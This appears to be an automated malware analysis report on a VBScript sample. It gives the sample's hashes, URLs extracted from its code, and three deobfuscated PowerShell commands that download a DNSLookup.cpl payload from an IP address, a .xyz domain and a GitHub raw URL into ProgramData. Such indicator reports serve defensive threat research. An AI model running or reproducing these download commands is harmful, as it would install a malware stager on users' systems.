|
Hash | Hash Value |
|---|---|
| MD5 | 1c34c387ea28ebbe173fc0bcae0a2d86
|
| Sha1 | 33efcd8c290df171da5f10924dab585b8be8a115
|
| Sha256 | 0cba8f95a87418faf019a814d7a277762786b89d4dc04af045d02a39329a2293
|
| Sha384 | 3f3c058f605578e7e3aae3644381dd1085532f8146aac8e43df34b0e75807f11ee823ca6144e39d6e403f39c3cb6acbe
|
| Sha512 | 1666d132544e0aad0bf472ac6c4c80afda1c7f2bb22b0d60ad44d2292937eac672c28098cbbe1dc602996df5a2d31f263d2fc8ed64de5d9f385fa479b524a60e
|
| SSDeep | 96:TPzx3n3aS0bTXRS/lq/Mh73h/9GZEuJdFtS5X+wo+iZdFYo+7gpafs1tyOjckdgO:Lzh336XRSQykJQ5XIt/0Gl6RzE
|
| TLSH | 5CD13A8CE1FB6BDE6C332BE5588C2C8D640852B17D04713EE8A574D0AD7686CE1F9434
|
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | https://upload.wikimedia.org/wikipedia/commons/5/56/Bsodwindows10.png |
| URLs in VB Code - #2 | https://sbrevorp.xyz/Krawl/DNSLookup.cpl |
| URLs in VB Code - #3 | http://45.143.167.244/Krawl/DNSLookup.cpl |
| URLs in VB Code - #4 | https://raw.githubusercontent.com/XING54YT/X/main/DNSLookup.cpl |
| Deobfuscated PowerShell | Invoke-WebRequest -Uri "http://45.143.167.244/Krawl/DNSLookup.cpl" -Outfile "C:\\ProgramData\\DNSBackup\\DNSLookup.cpl" |
| Deobfuscated PowerShell | Invoke-WebRequest -Uri "https://raw.githubusercontent.com/XING54YT/X/main/DNSLookup.cpl" -Outfile "C:\\ProgramData\\DNSBackup\\DNSLookup.cpl" |
| Deobfuscated PowerShell | Invoke-WebRequest -Uri "https://sbrevorp.xyz/Krawl/DNSLookup.cpl" -Outfile "C:\\ProgramData\\DNSBackup\\DNSLookup.cpl" |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | https://upload.wikimedia.org/wikipedia/commons/5/56/Bsodwindows10.png |
1c34c387ea28ebbe173fc0bcae0a2d86 |
| URLs in VB Code - #2 | https://sbrevorp.xyz/Krawl/DNSLookup.cpl |
1c34c387ea28ebbe173fc0bcae0a2d86 |
| URLs in VB Code - #3 | http://45.143.167.244/Krawl/DNSLookup.cpl |
1c34c387ea28ebbe173fc0bcae0a2d86 |
| URLs in VB Code - #4 | https://raw.githubusercontent.com/XING54YT/X/main/DNSLookup.cpl |
1c34c387ea28ebbe173fc0bcae0a2d86 |
| Deobfuscated PowerShell | Invoke-WebRequest -Uri "http://45.143.167.244/Krawl/DNSLookup.cpl" -Outfile "C:\\ProgramData\\DNSBackup\\DNSLookup.cpl" Malicious |
1c34c387ea28ebbe173fc0bcae0a2d86 > 1c34c387ea28ebbe173fc0bcae0a2d86.deobfuscated.vbs > [Command #1] > [PowerShell Command] |
| Deobfuscated PowerShell | Invoke-WebRequest -Uri "https://raw.githubusercontent.com/XING54YT/X/main/DNSLookup.cpl" -Outfile "C:\\ProgramData\\DNSBackup\\DNSLookup.cpl" Malicious |
1c34c387ea28ebbe173fc0bcae0a2d86 > 1c34c387ea28ebbe173fc0bcae0a2d86.deobfuscated.vbs > [Command #2] > [PowerShell Command] |
| Deobfuscated PowerShell | Invoke-WebRequest -Uri "https://sbrevorp.xyz/Krawl/DNSLookup.cpl" -Outfile "C:\\ProgramData\\DNSBackup\\DNSLookup.cpl" Malicious |
1c34c387ea28ebbe173fc0bcae0a2d86 > 1c34c387ea28ebbe173fc0bcae0a2d86.deobfuscated.vbs > [Command #0] > [PowerShell Command] |